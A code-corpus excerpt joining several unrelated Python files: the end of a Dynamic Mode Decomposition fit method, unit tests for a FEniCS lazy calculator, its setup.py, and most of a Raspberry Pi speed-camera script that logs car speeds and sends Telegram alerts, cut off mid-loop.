        method uses the argument for the truncation; if float between 0 and 1,
        the rank is the number of the biggest singular values that are needed
        to reach the 'energy' specified by `svd_rank`; if -1, the method does
        not compute truncation.
    :type svd_rank: int or float
    :param int tlsq_rank: rank truncation computing Total Least Square. Default
        is 0, that means TLSQ is not applied.
    :param bool exact: flag to compute either exact DMD or projected DMD.
        Default is False.
    :param bool opt: flag to compute optimized DMD. Default is False.
    """

    def fit(self, X):
        """
        Compute the Dynamic Modes Decomposition to the input data.

        :param X: the input snapshots.
        :type X: numpy.ndarray or iterable
        """
        self._snapshots, self._snapshots_shape = self._col_major_2darray(X)
        n_samples = self._snapshots.shape[1]
        # Split snapshots into "current" and one-step-"shifted" states
        current = self._snapshots[:, :-1]
        shifted = self._snapshots[:, 1:]
        # Optional total-least-squares denoising
        current, shifted = self._compute_tlsq(current, shifted, self.tlsq_rank)
        # Reduced Koopman operator from the (truncated) SVD of current states
        U, s, V = self._compute_svd(current, self.svd_rank)
        self._Atilde = self._build_lowrank_op(U, s, V, shifted)
        self._eigs, self._modes = self._eig_from_lowrank_op(
            self._Atilde, shifted, U, s, V, self.exact)
        self._b = self._compute_amplitudes(self._modes, self._snapshots,
                                           self._eigs, self.opt)
        # Default timesteps: unit spacing over the input snapshots
        self.original_time = {'t0': 0, 'tend': n_samples - 1, 'dt': 1}
        self.dmd_time = {'t0': 0, 'tend': n_samples - 1, 'dt': 1}
        return self
|
MiroK/fenics-cacl | test/test_interpreter.py | <reponame>MiroK/fenics-cacl
from xcalc.interpreter import Eval
from dolfin import *
import numpy as np
import unittest
def error(true, me):
    """Return the L2 distance between `me` and `true` over me's mesh."""
    domain = me.function_space().mesh()
    diff = me - true
    l2_squared = assemble(inner(diff, diff) * dx(domain=domain))
    return sqrt(abs(l2_squared))
class TestCases(unittest.TestCase):
    '''UnitTest for (some of) xcalc.interpreter (no timeseries)'''

    def test_sanity0(self):
        mesh = UnitSquareMesh(4, 4)
        V = FunctionSpace(mesh, 'CG', 1)
        f = Expression('x[0]', degree=1)
        g = Expression('x[1]', degree=1)
        a = 3
        b = -2
        u = interpolate(f, V)
        v = interpolate(g, V)
        expr = a*u + b*v
        me = Eval(expr)
        true = Expression('a*f+b*g', f=f, g=g, a=a, b=b, degree=1)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_sanity1(self):
        mesh = UnitSquareMesh(5, 5)
        T = TensorFunctionSpace(mesh, 'DG', 0)
        u = interpolate(Expression((('x[0]', 'x[1]'),
                                    ('2*x[0]+x[1]', 'x[0]+3*x[1]')), degree=1), T)
        expr = sym(u) + skew(u)
        me = Eval(expr)
        true = u
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_sanity2(self):
        mesh = UnitSquareMesh(5, 5)
        T = TensorFunctionSpace(mesh, 'CG', 1)
        A = interpolate(Expression((('x[0]', 'x[1]'),
                                    ('2*x[0]+x[1]', 'x[0]+3*x[1]')), degree=1), T)
        expr = tr(sym(A) + skew(A))
        me = Eval(expr)
        true = Expression('x[0] + x[0] + 3*x[1]', degree=1)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_sanity3(self):
        mesh = UnitSquareMesh(5, 5)
        T = TensorFunctionSpace(mesh, 'CG', 1)
        A = interpolate(Expression((('x[0]', 'x[1]'),
                                    ('2*x[0]+x[1]', 'x[0]+3*x[1]')), degree=1), T)
        expr = (sym(A) + skew(A))[0, 0]
        me = Eval(expr)
        true = Expression('x[0]', degree=1)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_sanity4(self):
        mesh = UnitSquareMesh(5, 5)
        T = TensorFunctionSpace(mesh, 'CG', 1)
        A = interpolate(Expression((('x[0]', 'x[1]'),
                                    ('2*x[0]+x[1]', 'x[0]+3*x[1]')), degree=1), T)
        expr = (sym(A) + skew(A))[:, 0]
        me = Eval(expr)
        true = Expression(('x[0]', '2*x[0]+x[1]'), degree=1)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_sanity5(self):
        mesh = UnitSquareMesh(5, 5)
        T = TensorFunctionSpace(mesh, 'CG', 1)
        A = interpolate(Expression((('1', 'x[0]'),
                                    ('2', 'x[1]')), degree=1), T)
        expr = det(A)
        me = Eval(expr)
        true = Expression('x[1]-2*x[0]', degree=1)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_sanity6(self):
        mesh = UnitCubeMesh(5, 5, 5)
        T = TensorFunctionSpace(mesh, 'CG', 1)
        A = interpolate(Expression((('x[0]', '0', '1'),
                                    ('0', '1', 'x[1]'),
                                    ('x[2]', '0', '1')), degree=1), T)
        expr = det(A)
        me = Eval(expr)
        true = Expression('x[0]-x[2]', degree=1)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_sanity7(self):
        mesh = UnitSquareMesh(5, 5)
        T = TensorFunctionSpace(mesh, 'CG', 1)
        A = interpolate(Expression((('1', 'x[0]'),
                                    ('2', 'x[1]')), degree=1), T)
        V = VectorFunctionSpace(mesh, 'CG', 1)
        v = interpolate(Expression(('x[0]+x[1]', '1'), degree=1), V)
        me = Eval(dot(A, v))
        true = Expression(('x[1]+2*x[0]', '2*x[0]+3*x[1]'), degree=1)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_sanity8(self):
        mesh = UnitSquareMesh(5, 5)
        T = TensorFunctionSpace(mesh, 'CG', 1)
        A = interpolate(Expression((('1', 'x[0]'),
                                    ('2', 'x[1]')), degree=1), T)
        V = VectorFunctionSpace(mesh, 'CG', 1)
        v = interpolate(Expression(('x[0]+x[1]', '1'), degree=1), V)
        me = Eval(dot(v, transpose(A)))
        true = Expression(('x[1]+2*x[0]', '2*x[0]+3*x[1]'), degree=1)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    # BUG FIX: this method was also named `test_sanity8`, silently shadowing
    # the dot(v, transpose(A)) test above so it never ran. Renamed so both
    # tests are discovered and executed.
    def test_sanity8b(self):
        mesh = UnitSquareMesh(5, 5)
        V = VectorFunctionSpace(mesh, 'CG', 1)
        v0 = interpolate(Expression(('x[0]+x[1]', '1'), degree=1), V)
        v1 = interpolate(Expression(('1', 'x[0]'), degree=1), V)
        me = Eval(inner(v0, v1))
        true = Expression('x[1]+2*x[0]', degree=1)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_sanity9(self):
        mesh = UnitSquareMesh(5, 5)
        V = FunctionSpace(mesh, 'CG', 1)
        a0 = interpolate(Expression('x[0]', degree=1), V)
        a1 = interpolate(Expression('x[1]', degree=1), V)
        me = Eval(as_vector((a0, a1)))
        x, y = SpatialCoordinate(mesh)
        true = as_vector((x, y))
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_sanity10(self):
        mesh = UnitSquareMesh(5, 5)
        V = FunctionSpace(mesh, 'CG', 1)
        a0 = interpolate(Expression('x[0]', degree=1), V)
        a1 = interpolate(Expression('x[1]', degree=1), V)
        true = as_vector((as_vector((a0, a1)), as_vector((-a0, -a1))))
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_sanity11(self):
        mesh = UnitSquareMesh(5, 5)
        true = SpatialCoordinate(mesh)
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_sanity12(self):
        mesh = UnitSquareMesh(5, 5)
        x, y = SpatialCoordinate(mesh)
        true = as_vector((x+y, x-y))
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_comp_tensor_row_slice(self):
        mesh = UnitSquareMesh(4, 4)
        x, y = SpatialCoordinate(mesh)
        A = as_matrix(((x, 2*y), (3*y, 4*x)))
        true = A[1, :]
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_comp_tensor_col_slice(self):
        mesh = UnitSquareMesh(4, 4)
        x, y = SpatialCoordinate(mesh)
        A = as_matrix(((x, 2*y), (3*y, 4*x)))
        true = A[:, 0]
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_comp_tensor_num_vec(self):
        mesh = UnitSquareMesh(4, 4)
        r = SpatialCoordinate(mesh)
        true = Constant(2)*r
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_comp_tensor_mat_vec(self):
        mesh = UnitSquareMesh(4, 4)
        x, y = SpatialCoordinate(mesh)
        A = as_matrix(((x, 2*y), (3*y, 4*x)))
        V = VectorFunctionSpace(mesh, 'CG', 1)
        b = interpolate(Constant((1, 2)), V)
        true = A*b
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_comp_tensor_mat_mat(self):
        mesh = UnitSquareMesh(4, 4)
        T = TensorFunctionSpace(mesh, 'DG', 0)
        A = interpolate(Constant(((1, 2), (3, 4))), T)
        B = interpolate(Constant(((1, -2), (-1, 4))), T)
        true = A*B
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_comp_tensor_mat_mat_mat(self):
        mesh = UnitSquareMesh(4, 4)
        T = TensorFunctionSpace(mesh, 'DG', 0)
        A = interpolate(Constant(((1, 2), (3, 4))), T)
        B = interpolate(Constant(((1, -2), (-1, 4))), T)
        true = A*B*A
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_comp_tensor_mat_mat_vec(self):
        mesh = UnitSquareMesh(4, 4)
        T = TensorFunctionSpace(mesh, 'DG', 0)
        A = interpolate(Constant(((1, 2), (3, 4))), T)
        B = interpolate(Constant(((1, -2), (-1, 4))), T)
        V = VectorFunctionSpace(mesh, 'DG', 0)
        b = interpolate(Constant((-1, -2)), V)
        true = A*B*b
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_comp_tensor_num_mat(self):
        mesh = UnitSquareMesh(4, 4)
        x, y = SpatialCoordinate(mesh)
        A = as_matrix(((x, y), (y, -x)))
        true = Constant(2)*A
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_min(self):
        mesh = UnitSquareMesh(4, 4)
        x, y = SpatialCoordinate(mesh)
        true = Min(x, y)
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_max(self):
        mesh = UnitSquareMesh(4, 4)
        x, y = SpatialCoordinate(mesh)
        true = Max(x+y, 2*y)
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_cond_simple_conv(self):
        # Outside of CG1 with nonlinearity?
        errors = []
        for n in (4, 8, 16, 32, 64):
            mesh = UnitSquareMesh(n, n)
            x, y = SpatialCoordinate(mesh)
            true = conditional(x < y, x+y, x-y)
            me = Eval(true)
            errors.append(error(true, me))
        self.assertTrue((np.diff(errors) < 0).all())

    def test_cond_simple(self):
        mesh = UnitSquareMesh(4, 4)
        V = FunctionSpace(mesh, 'DG', 0)
        x = interpolate(Constant(1), V)
        y = interpolate(Constant(2), V)
        true = conditional(x < y, x+y, x-y)
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)

    def test_cond_logic(self):
        errors = []
        for n in (4, 8, 16, 32, 64):
            mesh = UnitSquareMesh(n, n)
            x, y = SpatialCoordinate(mesh)
            true = conditional(And(x < y, Constant(0) < x), x+y, x-y)
            me = Eval(true)
            errors.append(error(true, me))
        self.assertTrue((np.diff(errors) < 0).all())

    def test_cond_logic_simple(self):
        # We're outside of the CG1!
        mesh = UnitSquareMesh(4, 4)
        V = FunctionSpace(mesh, 'DG', 0)
        x = interpolate(Constant(1), V)
        y = interpolate(Constant(2), V)
        true = conditional(And(x < y, 0 < x), x+y, x-y)
        me = Eval(true)
        e = error(true, me)
        self.assertTrue(e < 1E-14)
|
MiroK/fenics-cacl | setup.py | #!/usr/bin/env python
from distutils.core import setup

# NOTE(review): distutils is deprecated and removed in Python 3.12; consider
# migrating to setuptools.setup (same keyword interface) -- confirm the
# supported Python versions for this package first.
# NOTE(review): 'functons' in the description looks like a typo for
# 'functions'; left untouched here since it is release metadata.
setup(name = 'fenics_calc',
      version = '0.1',
      description = 'Lazy calculator over FEniCS functons',
      author = '<NAME>',
      author_email = '<EMAIL>',
      url = 'https://github.com/mirok/fenics-calc.git',
      packages = ['xcalc'],
      package_dir = {'xcalc': 'xcalc'}
      )
|
stjohnjohnson/carspeed.py | speed-camera.py | # speed-camera v4.0
"""
Script to capture moving car speed
Usage:
speed-camera.py [preview] [--config=<file>]
Options:
-h --help Show this screen.
"""
# import the necessary packages
from docopt import docopt
from picamera import PiCamera
from picamera.array import PiRGBArray
from pathlib import Path
from datetime import datetime, timezone
import cv2
import numpy as np
import logging
import time
import math
import json
import yaml
import shutil
import telegram
import subprocess
from multiprocessing import Process
# Location for files/logs
FILENAME_SERVICE = "logs/service.log"
FILENAME_RECORD = "logs/recorded_speed.csv"
# Important constants
MIN_SAVE_BUFFER = 2
THRESHOLD = 25
BLURSIZE = (15,15)
# the following enumerated values are used to make the program more readable
WAITING = 0
TRACKING = 1
SAVING = 2
UNKNOWN = 0
LEFT_TO_RIGHT = 1
RIGHT_TO_LEFT = 2
class Config:
    """Runtime configuration for the speed camera.

    Class attributes below are the defaults; ``Config.load`` overrides any
    of them with values from a YAML file and derives the helper fields
    (corner tuples, monitored width/height, resolution list).
    """
    # monitoring area
    upper_left_x = 0
    upper_left_y = 0
    lower_right_x = 1024
    lower_right_y = 576
    # range
    l2r_distance = 65           # <---- distance-to-road in feet (left-to-right side)
    r2l_distance = 80           # <---- distance-to-road in feet (right-to-left side)
    # camera settings
    fov = 62.2                  # <---- field of view
    fps = 30                    # <---- frames per second
    image_width = 1024          # <---- resolution width
    image_height = 576          # <---- resolution height
    image_min_area = 500        # <---- minimum area for detecting motion
    camera_vflip = False        # <---- flip camera vertically
    camera_hflip = False        # <---- flip camera horizontally
    # thresholds for recording
    min_distance = 0.4          # <---- minimum distance between cars
    min_speed = 10              # <---- minimum speed for recording events
    min_speed_alert = 30        # <---- minimum speed for sending an alert
    min_area = 2000             # <---- minimum area for recording events
    min_confidence = 70         # <---- minimum percentage confidence for recording events
    min_confidence_alert = 90   # <---- minimum percentage confidence for saving images
    # communication
    telegram_token = ""         # <---- bot token to authenticate with Telegram
    telegram_chat_id = ""       # <---- person/group `chat_id` to send the alert to
    telegram_frequency = 6      # <---- hours between periodic text updates

    @staticmethod
    def _normalize(cfg):
        """Order the monitoring-area corners and derive helper fields.

        Returns the same cfg instance, mutated in place.
        """
        # BUG FIX: the original sequential assignments did not swap the
        # coordinates -- after `upper = lower; lower = upper` both ended up
        # equal to the old lower_right value. Use tuple swapping instead.
        if cfg.upper_left_x > cfg.lower_right_x:
            cfg.upper_left_x, cfg.lower_right_x = cfg.lower_right_x, cfg.upper_left_x
        if cfg.upper_left_y > cfg.lower_right_y:
            cfg.upper_left_y, cfg.lower_right_y = cfg.lower_right_y, cfg.upper_left_y
        # Derived convenience fields used by the capture loop
        cfg.upper_left = (cfg.upper_left_x, cfg.upper_left_y)
        cfg.lower_right = (cfg.lower_right_x, cfg.lower_right_y)
        cfg.monitored_width = cfg.lower_right_x - cfg.upper_left_x
        cfg.monitored_height = cfg.lower_right_y - cfg.upper_left_y
        cfg.resolution = [cfg.image_width, cfg.image_height]
        return cfg

    @staticmethod
    def load(config_file):
        """Load settings from a YAML file, ignoring unknown keys.

        Exits the process with status 1 on a YAML parse error.
        """
        cfg = Config()
        with open(config_file, 'r') as stream:
            try:
                data = yaml.safe_load(stream)
                for key, value in data.items():
                    # Only accept keys this class declares
                    if hasattr(cfg, key):
                        setattr(cfg, key, value)
            except yaml.YAMLError as exc:
                logging.error("Failed to load config: {}".format(exc))
                exit(1)
        return Config._normalize(cfg)
class Recorder:
    """Persists detected vehicle events to a CSV file and, when configured,
    sends GIF alerts of fast vehicles through a Telegram bot."""
    # thresholds for recording
    min_speed = 10              # <---- minimum speed for recording events
    min_speed_alert = 30        # <---- minimum speed for sending an alert
    min_area = 2000             # <---- minimum area for recording events
    min_confidence = 70         # <---- minimum percentage confidence for recording events
    min_confidence_alert = 70   # <---- minimum percentage confidence for saving images
    # communication
    telegram_token = ""         # <---- telegram bot token
    telegram_chat_id = ""       # <---- telegram chat ID
    bot = None
    # Location of the record
    RECORD_FILENAME = 'logs/recorded_speed.csv'
    RECORD_HEADERS = 'timestamp,speed,speed_deviation,area,area_deviation,frames,seconds,direction'

    def __init__(self, cfg):
        # Copy over any settings this class also declares.
        # NOTE(review): only attributes set directly on the cfg *instance*
        # (e.g. by Config.load) appear in cfg.__dict__; class-level defaults
        # on Config are not copied -- confirm that is the intent.
        for key, value in cfg.__dict__.items():
            if hasattr(self, key):
                setattr(self, key, value)
        # Initialize Bot (only when both credentials are present)
        self.bot = None
        if self.telegram_token and self.telegram_chat_id:
            self.bot = telegram.Bot(self.telegram_token)
        # Write headers to the output csv on first run
        f = Path(self.RECORD_FILENAME)
        if not f.is_file():
            self.write_csv(self.RECORD_HEADERS)

    def send_animation(self, timestamp, events, confidence, mph):
        """Render the event frames to an animated GIF, send it via Telegram,
        dump the event metadata to JSON, and remove the temporary frames."""
        folder = "logs/{}-{:02.0f}mph-{:.0f}".format(timestamp.strftime('%Y-%m-%d_%H:%M:%S.%f'), mph, confidence)
        gif_file = "{}.gif".format(folder)
        json_file = "{}.json".format(folder)
        # Create the directory
        Path(folder).mkdir(parents=True, exist_ok=True)
        data = []
        for e in events:
            # annotate it
            image = annotate_image(e['image'], e['ts'], mph=e['mph'], confidence=confidence, x=e['x'], y=e['y'], w=e['w'], h=e['h'])
            # and save the image to disk
            cv2.imwrite("{}/{}.jpg".format(folder, e['ts']), image)
            # Drop the raw frame before JSON-serializing the event record
            del(e['image'])
            e['ts'] = e['ts'].timestamp()
            data.append(e)
        with open(json_file, 'w') as outfile:
            json.dump(data, outfile)
        # Create a gif with ImageMagick (frames live inside `folder`)
        p = subprocess.Popen(["/usr/bin/convert", "-delay", "10", "*.jpg", "../../{}".format(gif_file)], cwd=folder)
        p.wait()
        # Remove the temporary files
        shutil.rmtree(folder, ignore_errors=True)
        # Send message
        self.send_gif(
            filename=gif_file,
            text='{:.0f} mph @ {:.0f}%'.format(mph, confidence)
        )
        return gif_file

    def write_csv(self, message):
        """Append one line to the CSV record file."""
        # BUG FIX: the original called `f.close` without parentheses, so the
        # handle was never explicitly closed. A context manager guarantees
        # the write is flushed and the file closed.
        with open(self.RECORD_FILENAME, 'a') as f:
            f.write(message + "\n")

    def send_message(self, text):
        """Send a plain-text Telegram message (no-op when unconfigured)."""
        if not self.bot:
            return
        self.bot.send_message(
            chat_id=self.telegram_chat_id,
            text=text
        )

    def send_image(self, filename, text):
        """Send a photo with caption via Telegram (no-op when unconfigured)."""
        if not self.bot:
            return
        self.bot.send_photo(
            chat_id=self.telegram_chat_id,
            photo=open(filename, 'rb'),
            caption=text
        )

    def send_gif(self, filename, text):
        """Send an animation with caption via Telegram (no-op when unconfigured)."""
        if not self.bot:
            return
        self.bot.send_animation(
            chat_id=self.telegram_chat_id,
            animation=open(filename, 'rb'),
            caption=text
        )

    def record(self, confidence, image, timestamp, mean_speed, avg_area, sd_speed, sd_area, speeds, secs, direction, events):
        """Record one vehicle pass; returns False when it fails the thresholds.

        Always appends a CSV line for qualifying events; additionally spawns
        a background process to build and send the alert GIF when the event
        also clears the alert thresholds.
        """
        if confidence < self.min_confidence or mean_speed < self.min_speed or avg_area < self.min_area:
            return False
        # Write the log
        self.write_csv("{},{:.0f},{:.0f},{:.0f},{:.0f},{:d},{:.2f},{:s}".format(
            timestamp.timestamp(), mean_speed, sd_speed, avg_area, sd_area, len(speeds), secs, str_direction(direction))
        )
        # If the threshold is high enough, alert and write to disk.
        # GIF encoding is slow, so it runs in a separate process.
        if confidence >= self.min_confidence_alert and mean_speed >= self.min_speed_alert:
            p = Process(target=self.send_animation, args=(timestamp, events, confidence, mean_speed,))
            p.start()
        return True
def get_speed(pixels, ftperpixel, secs):
    """Convert a pixel displacement over `secs` seconds into miles per hour.

    Returns 0.0 when no time has elapsed (avoids division by zero).
    """
    if secs <= 0.0:
        return 0.0
    feet_per_second = (pixels * ftperpixel) / secs
    return feet_per_second * 0.681818  # ft/s -> mph
# calculate pixel width
def get_pixel_width(fov, distance, image_width):
    """Return how many feet one image pixel spans at *distance* feet.

    The horizontal field of view (degrees) fixes the real-world width of
    the frame at that distance; dividing by the pixel width of the image
    gives the feet-per-pixel scale.
    """
    half_angle = math.radians(fov) * 0.5
    frame_width_ft = 2.0 * distance * math.tan(half_angle)
    return frame_width_ft / float(image_width)
def str_direction(direction):
    """Return a three-letter label ('LTR'/'RTL'/'???') for a direction constant."""
    if direction == LEFT_TO_RIGHT:
        return "LTR"
    if direction == RIGHT_TO_LEFT:
        return "RTL"
    return "???"
# calculate elapsed seconds
def secs_diff(endTime, begTime):
    """Return the elapsed seconds (float, may be negative) from *begTime* to *endTime*."""
    return (endTime - begTime).total_seconds()
def parse_command_line():
    """Parse the docopt command line; return (preview, config_file).

    *preview* is True when the 'preview' command was given; *config_file*
    is a Path (validated to exist) or None when --config was not supplied.
    """
    logging.info("Initializing")
    args = docopt(__doc__)
    preview = bool(args['preview'])
    config_file = None
    if args['--config']:
        config_file = Path(args['--config'])
        if not config_file.is_file():
            logging.error("config file does NOT exist")
            exit(1)
    return (preview, config_file)
def detect_motion(image, min_area):
    """Find the largest moving region in a thresholded image.

    Returns (motion_found, x, y, w, h, biggest_area), where the bounding
    box is the largest contour whose box area exceeds *min_area*; all
    zeros with motion_found False when nothing qualifies.
    """
    # dilate the thresholded image to fill in any holes, then find contours
    # on thresholded image
    image = cv2.dilate(image, None, iterations=2)
    # cv2.findContours returns a 3-tuple on OpenCV 3.x but a 2-tuple on
    # 4.x; the original hard-coded the 3-tuple unpacking and crashed on
    # OpenCV 4. Take the contour list from whichever shape we got.
    found = cv2.findContours(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    cnts = found[0] if len(found) == 2 else found[1]
    # look for motion
    motion_found = False
    biggest_area = 0
    x = 0
    y = 0
    w = 0
    h = 0
    # examine the contours, looking for the largest one
    for c in cnts:
        (x1, y1, w1, h1) = cv2.boundingRect(c)
        # get an approximate area of the contour via its bounding box
        found_area = w1 * h1
        # find the largest bounding rectangle
        if (found_area > min_area) and (found_area > biggest_area):
            biggest_area = found_area
            motion_found = True
            x = x1
            y = y1
            w = w1
            h = h1
    return (motion_found, x, y, w, h, biggest_area)
def annotate_image(image, timestamp, mph=0, confidence=0, h=0, w=0, x=0, y=0):
    """Return a grayscale copy of *image* annotated for human review.

    Draws the timestamp, optional speed and confidence readouts, the two
    vertical boundary lines of the monitored area, and (when w/h are
    given) the bounding box of the detected object. Relies on the
    module-level `cfg` for image dimensions and boundary coordinates.
    """
    global cfg
    # colors (BGR)
    color_green = (0, 255, 0)
    color_red = (0, 0, 255)
    # make it gray, then convert back to BGR so colored overlays still render
    image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    image = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
    # timestamp the image (bottom-left corner)
    cv2.putText(image, timestamp.strftime("%d %B %Y %H:%M:%S.%f"),
                (10, image.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, color_red, 2)
    # write the speed
    if mph > 0:
        msg = "{:.0f} mph".format(mph)
        (size, _) = cv2.getTextSize(msg, cv2.FONT_HERSHEY_SIMPLEX, 2, 3)
        # then center it horizontally on the image
        cntr_x = int((cfg.image_width - size[0]) / 2)
        cv2.putText(image, msg, (cntr_x, int(cfg.image_height * 0.2)), cv2.FONT_HERSHEY_SIMPLEX, 2.00, color_red, 3)
    # write the confidence
    if confidence > 0:
        msg = "{:.0f}%".format(confidence)
        (size, _) = cv2.getTextSize(msg, cv2.FONT_HERSHEY_SIMPLEX, 2, 3)
        # then right align it horizontally on the image (3/4 of the width)
        cntr_x = int((cfg.image_width - size[0]) / 4) * 3
        cv2.putText(image, msg, (cntr_x, int(cfg.image_height * 0.2)), cv2.FONT_HERSHEY_SIMPLEX, 1.00, color_red, 3)
    # define the monitored area right and left boundary
    cv2.line(image, (cfg.upper_left_x, cfg.upper_left_y),
             (cfg.upper_left_x, cfg.lower_right_y), color_green, 4)
    cv2.line(image, (cfg.lower_right_x, cfg.upper_left_y),
             (cfg.lower_right_x, cfg.lower_right_y), color_green, 4)
    # Add the boundary box of the detection, offset from monitored-area
    # coordinates back into full-frame coordinates
    if h > 0 and w > 0:
        cv2.rectangle(image,
                      (cfg.upper_left_x + x, cfg.upper_left_y + y),
                      (cfg.upper_left_x + x + w, cfg.upper_left_y + y + h), color_green, 2)
    return image
# initialize the camera. Adjust vflip and hflip to reflect your camera's orientation
def setup_camera(cfg):
    """Boot the PiCamera and allocate a raw capture buffer.

    Returns (camera, capture) ready for capture_continuous().
    """
    logging.info("Booting up camera")
    camera = PiCamera(resolution=cfg.resolution, framerate=cfg.fps, sensor_mode=5)
    camera.vflip = cfg.camera_vflip
    camera.hflip = cfg.camera_hflip
    # raw-array capture target sized to the camera resolution
    capture = PiRGBArray(camera, size=camera.resolution)
    time.sleep(2)  # allow the sensor to warm up before first use
    return (camera, capture)
# Setup logging: messages go to both the service log file and the console.
Path("logs").mkdir(parents=True, exist_ok=True)
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s %(message)s',
    handlers=[
        logging.FileHandler(FILENAME_SERVICE),
        logging.StreamHandler()
    ]
)
# parse command-line
(PREVIEW, config_file) = parse_command_line()
# load config
cfg = Config.load(config_file)
# setup camera
(camera, capture) = setup_camera(cfg)
# determine the boundary
logging.info("Monitoring: ({},{}) to ({},{}) = {}x{} space".format(
    cfg.upper_left_x, cfg.upper_left_y, cfg.lower_right_x, cfg.lower_right_y, cfg.monitored_width, cfg.monitored_height))
# initialize messaging
recorder = Recorder(cfg)
# calculate the width of the image at the distance specified, per direction
l2r_ft_per_pixel = get_pixel_width(cfg.fov, cfg.l2r_distance, cfg.image_width)
r2l_ft_per_pixel = get_pixel_width(cfg.fov, cfg.r2l_distance, cfg.image_width)
logging.info("L2R: {:.0f}ft from camera == {:.2f} per pixel".format(cfg.l2r_distance, l2r_ft_per_pixel))
logging.info("R2L: {:.0f}ft from camera == {:.2f} per pixel".format(cfg.r2l_distance, r2l_ft_per_pixel))
# tracking state machine (constants defined earlier in the file)
state = WAITING
direction = UNKNOWN
# location of the tracked object (pixels within the monitored area)
initial_x = 0
initial_w = 0
last_x = 0
last_w = 0
biggest_area = 0
areas = np.array([])
# timing
initial_time = datetime.now(timezone.utc)
cap_time = datetime.now(timezone.utc)
timestamp = datetime.now(timezone.utc)
# speeds
sd = 0
speeds = np.array([])
counter = 0
# event captures (one dict per tracked frame; filled in the main loop)
events = []
# fps bookkeeping
fps_time = datetime.now(timezone.utc)
fps_frames = 0
# capture reference frame (lazily initialized from the first frame)
base_image = None
# stats accumulated between periodic Telegram reports
stats_l2r = np.array([])
stats_r2l = np.array([])
stats_time = datetime.now(timezone.utc)
# startup
has_started = False
# capture frames from the camera (using capture_continuous.
# This keeps the picamera in capture mode - it doesn't need
# to prep for each frame's capture.
#
# Per-frame state machine: WAITING (no motion) -> TRACKING (motion inside
# the monitored box) -> SAVING (event recorded) -> back to WAITING.
for frame in camera.capture_continuous(capture, format="bgr", use_video_port=True):
    # initialize the timestamp
    timestamp = datetime.now(timezone.utc)
    # Save a preview of the image on the very first frame so the user can
    # verify the camera's aim; in preview mode we stop right after.
    if not has_started:
        image = annotate_image(frame.array, timestamp)
        cv2.imwrite("preview.jpg", image)
        recorder.send_image(
            filename='preview.jpg',
            text='Current View'
        )
        has_started = True
        if PREVIEW:
            exit(0)
    # Log the current FPS once per 1000 frames
    fps_frames += 1
    if fps_frames > 1000:
        elapsed = secs_diff(timestamp, fps_time)
        logging.info("Current FPS @ {:.0f}".format(fps_frames/elapsed))
        fps_time = timestamp
        fps_frames = 0
    # Share stats every cfg.telegram_frequency hours
    if secs_diff(timestamp, stats_time) > cfg.telegram_frequency * 60 * 60:
        stats_time = timestamp
        total = len(stats_l2r) + len(stats_r2l)
        if total > 0:
            l2r_perc = len(stats_l2r) / total * 100
            r2l_perc = len(stats_r2l) / total * 100
            l2r_mean = 0
            r2l_mean = 0
            if len(stats_l2r) > 0:
                l2r_mean = np.mean(stats_l2r)
            if len(stats_r2l) > 0:
                r2l_mean = np.mean(stats_r2l)
            recorder.send_message(
                "{:.0f} cars in the past {:.0f} hours\nL2R {:.0f}% at {:.0f} speed\nR2L {:.0f}% at {:.0f} speed".format(
                    total, cfg.telegram_frequency, l2r_perc, l2r_mean, r2l_perc, r2l_mean
                )
            )
            # clear stats
            stats_l2r = np.array([])
            stats_r2l = np.array([])
            stats_time = timestamp
    # grab the raw NumPy array representing the image
    image = frame.array
    # crop area defined by [y1:y2,x1:x2]
    gray = image[
        cfg.upper_left_y:cfg.lower_right_y,
        cfg.upper_left_x:cfg.lower_right_x
    ]
    # convert the frame to grayscale, and blur it
    gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY)
    gray = cv2.GaussianBlur(gray, BLURSIZE, 0)
    # if the base image has not been defined, initialize it
    if base_image is None:
        base_image = gray.copy().astype("float")
        lastTime = timestamp
        capture.truncate(0)
        continue
    # compute the absolute difference between the current image and
    # base image and then turn everything lighter gray than THRESHOLD into
    # white
    frameDelta = cv2.absdiff(gray, cv2.convertScaleAbs(base_image))
    thresh = cv2.threshold(frameDelta, THRESHOLD, 255, cv2.THRESH_BINARY)[1]
    # look for motion in the image
    (motion_found, x, y, w, h, biggest_area) = detect_motion(thresh, cfg.image_min_area)
    if motion_found:
        if state == WAITING:
            # initialize tracking
            state = TRACKING
            initial_x = x
            initial_w = w
            last_x = x
            last_w = w
            initial_time = timestamp
            last_mph = 0
            # initialise array for storing speeds & standard deviation
            areas = np.array([])
